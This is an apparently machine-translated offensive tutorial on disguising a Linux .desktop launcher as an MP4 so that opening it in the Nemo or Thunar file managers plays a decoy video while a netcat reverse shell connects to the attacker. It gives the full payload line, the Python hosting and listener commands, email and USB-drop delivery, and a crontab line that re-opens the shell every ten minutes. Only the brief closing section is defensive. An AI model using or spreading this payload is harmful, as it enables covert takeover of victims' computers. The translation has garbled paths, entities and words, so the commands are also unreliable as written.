What looks like an ordinary MP4 might have been developed by an attacker to compromise your Linux Mint operating system. Opening the file will play the intended video, but it will connect to the attacker's system in the background.
While Linux Mint is being used as an example in this article, the attack takes advantage of a problem in multiple Linux file managers. The following GIF shows the attack.
GIF extracts two files. The first one (real_video.mp4) is a real MP4 of a movie trailer. The second file (fake_video.mp4) is a .desktop file that is configured in this file manager to look like a regular MP4. What we can not see in the GIF is the Netcat connection to the attacker's system when fake_video.mp4 is opened. The goal is that fake_video.mp4 is legitimate and has no idea that the operating system was only compromised.
The .desktop file extension is used in Linux systems to build application launchers. For some examples, Linux Mint users can list files in the / usr / share / applications / directory.
$ ls -l /usr/share/applications/*.desktop -rw-r - r-- 1 root root 125 November 4, 2017 /usr/share/applications/apturl.desktop -rw-r - r-- 1 root root 8754 Nov 28 04:55 /usr/share/applications/blueberry.desktop -rw-r - r-- 1 root root 1383 Jan 11 11:41 /usr/share/applications/bluetooth-sendto.desktop -rw-r - r-- 1 root root 363 March 21 09:45 /usr/share/applications/cinnamon2d.desktop -rw-r - r-- 1 root root 448 6 Dec 05:22 /usr/share/applications/cinnamon-color-panel.desktop -rw-r - r-- 1 root root 300 December 6 05:22 /usr/share/applications/cinnamon-control-center.desktop -rw-r - r-- 1 root root 463 March 21 09:45 /usr/share/applications/cinnamon.desktop -rw-r - r-- 1 root root 496 December 6 05:22 /usr/share/applications/cinnamon-display-panel.desktop -rw-r - r-- 1 root root 200 March 21 09:45 /usr/share/applications/cinnamon-killer-daemon.desktop -rw-r - r-- 1 root root 272 March 21 09:45 /usr/share/applications/cinnamon-menu-editor.desktop -rw-r - r-- 1 root root 450 Dec 6 05:22 /usr/share/applications/cinnamon-network-panel.desktop -rw-r - r-- 1 root root 504 6 Dec 05:22 /usr/share/applications/cinnamon-online-accounts-panel.desktop -rw-r - r-- 1 root root 11580 March 21 09:45 /usr/share/applications/cinnamon-onscreen-keyboard.desktop -rw-r - r-- 1 root root 504 December 6 05:22 /usr/share/applications/cinnamon-region-panel.desktop -rw-r - r-- 1 root root 433 December 11 03:24 /usr/share/applications/cinnamon-screensaver.desktop -rw-r - r-- 1 root root 12473 March 21 09:45 /usr/share/applications/cinnamon-settings-applets.desktop ... -rw-r - r-- 1 root root 506 December 15, 2017 /usr/share/applications/seahorse.desktop -rw-r - r-- 1 root root 10609 March 26, 2018 /usr/share/applications/simple-scan.desktop -rw-r - r-- 1 root root 8996 May 10, 2018 /usr/share/applications/synaptic.desktop -rw-r - r-- 1 root root 518 April 3, 2018 /usr/share/applications/system-config-printer.desktop -rw-r - r-- 1 root root 10062 Mar 25 07:28 /usr/share/applications/thunderbird.desktop -rw-r - r-- 1 root root 820 November 30 08:53 /usr/share/applications/timeshift-gtk.desktop -rw-r - r-- 1 root root 11701 August 2, 2017 /usr/share/applications/tomboy.desktop -rw-r - r-- 1 root root 4493 February 6, 2018 /usr/share/applications/transmission-gtk.desktop -rw-r - r-- 1 root root 3617 April 10, 2018 /usr/share/applications/vim.desktop -rw-r - r-- 1 root root 9870 October 6, 2018 /usr/share/applications/vlc.desktop -rw-r - r-- 1 root root 992 December 10 11:48 am /usr/share/applications/xdg-desktop-portal-gtk.desktop -rw-r - r-- 1 root root 4526 December 11 06:10 /usr/share/applications/xed.desktop -rw-r - r-- 1 root root 9762 December 11 06:12 /usr/share/applications/xplayer.desktop -rw-r - r-- 1 root root 8056 December 11 06:15 /usr/share/applications/xreader.desktop -rw-r - r-- 1 root root 5309 December 11 06:18 /usr/share/applications/xviewer.desktop -rw-r - r-- 1 root root 3780 17 Dec 05:45 /usr/share/applications/yelp.desktop[19659008[ThisdirectorywillbeimploredinLimuxMintintegratedFileManagerNemoallocatedattachedattachedfilesaredisplayedasviewablebuttons
If You are using cat on one of the operating system's legitimate .desktop files, the following data is displayed.
$ cat /usr/share/applications/cinnamon-settings-calendar.desktop [Desktop Entry] Icon = cs-date-time Exec = cinnamon setting calendar Type = application OnlyShowIn = X-Cinnamon; Categories = Settings;
The most important lines to consider are the values Icon = and Exec = . The symbol value is responsible for the icon used to represent the .desktop file. The Exec value is responsible for the commands that are executed when the target clicks the .desktop file. In this case, clicking on the file executes the command Cinnamon Settings with the option Calendar . Clicking on this file opens the "Date & Time" settings window.
An attacker could misuse this feature to change how the .desktop file is displayed to the user and what programs start when the file is clicked while it is in the file the file manager.
Which operating systems are affected?
There are several notable desktop environments (DE) that are affected by this issue. These include: GNOME, Cinnamon, MATE, KDE, XFCE4 and LXDE. While this is not a comprehensive list of available DEs, it is one of the most popular.
Each DE uses a different file manager by default. For example, GNOME uses the Nautilus file manager and KDE uses the Dolphin file manager. None of these file managers are vulnerable to this attack. But! Remember - it's possible to install and use multiple file managers in a single operating system, much like two different web browsers are installed simultaneously. A GNOME target that has Nautilus installed may use another vulnerable file manager.
This article is intended to highlight the vulnerability in Cinnamon's default Nemo file manager. Nemo, like the Thunar file manager in XFCE4 systems, is vulnerable to this attack.
In my short series of tests against common operating systems, I noticed the following, arranged in the following operating systems: Manager format.
- Ubuntu 18.04 / GNOME / Nautilus
- Debian 10 / GNOME / Nautilus
- Basic OS 5 / Pantheon / Pantheon files
- Manjaro 18 / KDE / Dolphin [AffectedSystems:
- Linux Mint 19.2 / Cinnamon / Nemo
- Xubuntu 18.04 / XFCE4 / Thunar
- Fedora 30 / MATE / Caja
- MX Linux / XFCE4 / Thunar
How to Identify If the File Manager of a Destination Is Vulnerable
It is not an easy task to determine if the target is using a vulnerable file manager, especially if the attacker does not know about the target's operating system. However, if the attacker shares a Wi-Fi network with the target, it is possible to observe the traffic being transmitted to and from the operating system. The DNS requirements for a Linux Mint operating system are as follows:
Similarly, MX Linux operating systems also use custom repositories when retrieving system updates (see below).
It may not be possible to determine the DE or File Manager without the target passing on identifiable information in social media or otherwise. Make sure you leave tips and ideas in the comments to list this information!
We need to set up a simple HTTP server in Kali to host the real_video.mp4 file. When the target clicks the fake_video.desktop file, the real_video.mp4 file is downloaded in the background and played back automatically. As root first install Python3 on your Kali system.
~ # apt-get update && apt-get install python3 Read package lists ... Done Read package lists ... Done Create dependency tree Status information is read ... Done python3 is already the latest version (3.7.2-1). python3 set to manually installed. 0 updated, 0 reinstalled, 0 removed and 0 not updated.
Then use the command mkdir to create a temporary directory to store the attack files we have created.
~ # mkdir -p / tmp / pythonServer / videos
Then switch to the new video directory.
~ # cd / tmp / pythonServer / videos /
Step 2: Install YouTube dl
YouTube dl is a cross-platform command-line tool for downloading YouTube videos. The version of youtube-dl in the Kali Linux repository is usually a bit dated. Please refer to the GitHub repo for the latest version. Use the following command to install it.
~ # curl -L https://yt-dl.org/downloads/latest/youtube-dl -o / usr / local / bin / youtube-dl % Total% Received% Xferd Average Speed Time Time Time Actual Charge the entire remaining speed 100 1709k 100 1709k 0 0 70872 0 0:00:24 0:00:24 -: -: - 406k
Then enter the new binary youtube-dl permissions to run on the system with , Command chmod .
~ # chmod a + rx / usr / local / bin / youtube-dl
Step 3: Downloading a YouTube Video
In real-world scenarios, relevant videos should be used to outsmart the target users who believe that File fake_video is actually a real video. For demonstration purposes, I use Rickroll.
~ # youtube-dl --restrict-filenames -f 18 & # 39; https: //www.youtube.com/watch? V = dQw4w9WgXcQ & # 39; [youtube] dQw4w9WgXcQ: Website is being downloaded [youtube] dQw4w9WgXcQ: Video Info Website is being downloaded [youtube] dQw4w9WgXcQ: Downloading js player vflptN-I_ [youtube] dQw4w9WgXcQ: Downloading js player vflptN-I_ [download] Goal: Rick_Astley _-_ Never_Gonna_Give_You_Up_Official_Music_Video-dQw4w9WgXcQ.mp4 [download] 100% of 15.18 MB in 00:07
The filename is probably made up of bad characters. Rename the video file for simplicity. Use the following command mv with the wildcard (*) to rename it.
~ # mv Rick * .mp4 real_video.mp4
The command ls can then be used to display the contents of the directory and the renamed file.
~ # ls -l -rw-r - r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4
Use a favorite text editor such as Gedit, Geany, Vim or Nano to create a new one to create a "fake_video.desktop" file. In the following example nano is used.
~ # nano fake_video.desktop
Then copy the following text into the new file. The file extension .desktop is critical. The attack will not work without it.
#! / usr / bin / env xdg-open [Desktop Entry] Encoding = UTF-8 Name = fake_video.mp4 Exec = / usr / bin / wget & # 39; http: //192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; /usr/bin/xdg-open/tmp/real_video.mp4; / usr / bin / mkfifo / tmp / f; / bin / nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > / tmp / f 2> & 1 & Terminal = false Type = application Icon = video-x-generic
Several commands are executed ( Exec = ) and concatenated in a semicolon-separated line. I'll divide the one-liners into parts to better explain every command.
- / usr / bin / wget & # 39; http: //192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; - Wget downloads the real_video.mp4 file from the attacker's system to the target. It is stored in the / tmp directory with the same file name (-O). Change the address 192.168.1.XX to the IP address of the attacker's Kali system throughout the payload.
- / usr / bin / xdg-open /tmp/real_video.mp4; - The xdg The open command opens files with the preferred video player of the target operating system. If the target prefers VLC over MPV or another Linux video player, the real_video.mp4 file is automatically played on VLC. Hopefully, opening the video with the preferred media player will prevent the target from finding the fake_video.desktop file.
- / usr / bin / mkfifo / tmp / f; - Mkfifo creates a named pipe to redirect all of the following Netcat data to and from the attacker's system.
- / bin / nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > / tmp / f 2> & 1 & - Netcat and Bash are used (with the named pipe) to connect to the attacker systems (remember to change the XX in the IP address here to that of the attacker system). The port number (1234) is arbitrary and can be any number between 1 and 65535.
The symbol = can be changed here. The file names of the icons are in the directory / usr / share / icons / Mint-Y / mimetypes / 128 /. The file extension (.png) can be omitted when creating .desktop files, but is not required. Any file in the / usr / share / icons / directory can be used as a desktop file icon. For example, text files (text-x-generic), ZIP files (package-x-generic), and any other file types with a supporting PNG can be used in the icons / directory. There's plenty of room to be creative with social engineering attacks (see below for a fake ZIP file).
Command chmod to increase its permissions.
~ # chmod + x fake_video.desktop
The new permissions are checked by listing the contents of the directory. Note the execution permissions ( -rwxr-xr-x ).
~ # ls -l -rwxr-xr -x 1 root root 353 April 12 06:27 fake_video.desktop -rw-r - r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4
Python3 creates a web server on port 80 and creates the real_video. mp4 in the directory that is available to everyone on the network. Alternatively, this web server can be set up on a virtual private server for remote destinations.
~ # python3 -m http.server 80 Serving HTTP to 0.0.0.0 Port 80 (http://0.0.0.0:80/) ...
The Python3 terminal must remain open until the target clicks the fake_video.desktop file. If the Python3 server is unreachable when the fake_video is opened by the target, no video will play, but the target's computer will continue to make the netcat connection.
Step 7: Starting the Netcat Listener
Netcat listens ( -l ) on any available IPv4 interface using Port ( -p ) 1234. This Port number is arbitrary, but remember to consider the change in fake_video.desktop . Exec = Command created in step 5. The -vv issues a more detailed, more detailed edition. Extensive spending can be helpful in debugging connections.
~ # nc -vv -l -p 1234
With the setup of Python3 and Netcat servers, the attacker can deploy fake_video .desktop to the target. I have described two simple delivery methods below, but this is far from an exhaustive list of methods of attack. Other tactics are possible if the attacker knows more about the target.
Email is a good file-sharing vector. If the operating system of the target is detected or it is known that Linux systems are used in the workplace, then e-mail delivery is an ideal option. In this scenario, compressing the file (s) with zip is required to prevent e-mail clients and web browsers from displaying the .desktop file extension when the file is shared.
It may be desirable to include many files. Desktop payloads in the ZIP file were sent to the target to launch a convincing social engineering attack. Or mix real files with fake_videos.
First, make sure that zip is installed, as it is not included in all versions of Kali.
~ # apt-get install zip Read package lists ... Done Create dependency tree Status information is read ... Done The following NEW packages will be installed: Post Code 0 updated, 1 reinstalled, 0 removed and 0 not updated. Requires 234 kB archives. After this process, 623 KB of additional space will be used. Retrieved 234 kB in 6s (37.4 kB / s) Selection of the previously unselected package zip. (Database is being read ... 175224 files and directories are currently installed.) Preparing to unpack ... / zip_3.0-11 + b1_amd64.deb ... Unpack Zip (3.0-11 + b1) ... Set up Zip (3.0-11 + b1) ... Processing trigger for man-db (2.8.5-2) ...
In the videos / directory, use the following command zip to compress all the files in the directory.
~ # zip -r videos.zip ../videos/ Add: ../videos/ (0% saved) Add: ../videos/real_video.mp4 (empty 0%) Adding: ../videos/fake_video.desktop (33% dumped)
Zip will recursively ( -r ) compress all the files in the ../videos/ directory into a "videos.zip" Then the videos.zip file can be e-mailed to destinations.
Option 2: Drop USB
Readers may know that I am a fan of USB drop attacks. Almost 50% of all USB sticks found in the wild are picked up, plugged into a computer and examined by unsuspecting targets.The lonely USB is an excellent attack vector, since it is aimed specifically at the computer.An email attachment can be made with the smartphone If the target inserts the USB drive into its computer, Nemo will automatically try to mount it and display the file fake_video.desktop as "fake_video.mp4" so that it will not be necessary to compress the files via targeted social engineering attack See "Hack WPA2 Wi-Fi Passwords with USB Dead Drops". Similarly, shared USB devices in the workstation can be configured to mimic or clone real files on the USB device and exchange them with malicious user data.
To perform a USB drop attack, first connect the targeted USB drive to the Kali system. Then mount the USB drive and copy the file fake_video.desktop to the drive with the following command cp .
~ # cp /tmp/pythonServer/videos/*.desktop / media / root / USB NAME HERE /
Then eject the USB drive and leave it in a location that only the intended ones Find goals.
fake_video When you click .desktop, you will be connected to the netcat listener (see below).
~ # nc -vv -l -p 1234 Listen to [any] 1234 ... connect with [192.168.1.XX] from () [192.168.1.78] 37538 target_user @ Linux Mint: ~ $
At this time, it's usually a good idea to establish some level of persistence on the target's computer. If the original Netcat connection is lost or disconnected, it may be desirable to have a way to reconnect to the vulnerable Linux Mint device. A simple form of persistence can be configured with crontab .
Cron is a task scheduler found in Mint and Ubuntu operating systems. Cron jobs are often used by system administrators to automate repetitive tasks such as creating weekly backups and performing a specific task when the operating system restarts.
To ensure that Netcat recovers the connection to the attacker's system, echo the following commands in crontab . These commands instruct the Mint device to connect to the attacker's server every ten minutes.
echo & # 39; * / 10 * * * * / usr / bin / mkfifo / tmp / v; / bin / nc 192.168.1.XX 9999 < /tmp/v | /bin/bash -i > / tmp / v 2> & 1 & # 39; | crontab -
These are the same commands mkfifo and Netcat that were used in the payload fake_video.desktop in step 5. Start a new Netcat listener in the Kali system to get connections from the target's computer.  ~ # nc -vv -l -p 9999
As long as the target is connected to the same network, the vulnerable device connects to the netcat listener every 10 minutes. If the netcat listener does not work, the destination computer will fail silently and try again at the next interval.
How to protect yourself from desktop attacks
- File Manager – The Nemo and Thunar file managers in Cinnamon and XFCE4 are vulnerable to this type of attack. Try the File Manager Nautilus or Dolphin instead. They can be installed with the following command.
~ # apt-get install nautilus dolphin
After installation, open the Preferred Applications settings.
Change File Manager to Files with Blue File Icon. This is Nautilus.
If you click on Folder, the Nautilus File Manager will open, not Nemo. The file fake_video.desktop is displayed in its original form when using this file manager.
- Sandboxes – Using tools like Fire Prison. Firejail reduces the risk of security breaches by isolating applications and limiting them to sandbox environments (container environments) using simple visualization technology. The following GIF file demonstrates how to open an insecure file in a heavily sandbox-based environment.
For more information about securing Ubuntu-based operating systems, such as Linux Mint, see "Using Ubuntu as" Your Primary Operating System, Part 3 (Application Hardening & Sandboxing).
- Right-click – Double-clicking on random files is generally considered a best practice, and if you right-click on the files during this attack and try to open them with a specific program, that will be in the file fake_video.mp4 recommended a text editor, not a video player such as VLC or MPV, which is because the operating system knows it's a .desktop file with text.
Follow me on Twitter @tokyoneon_ and GitHub if you liked this article For any questions or concerns, feel free to send me a message or leave a comment.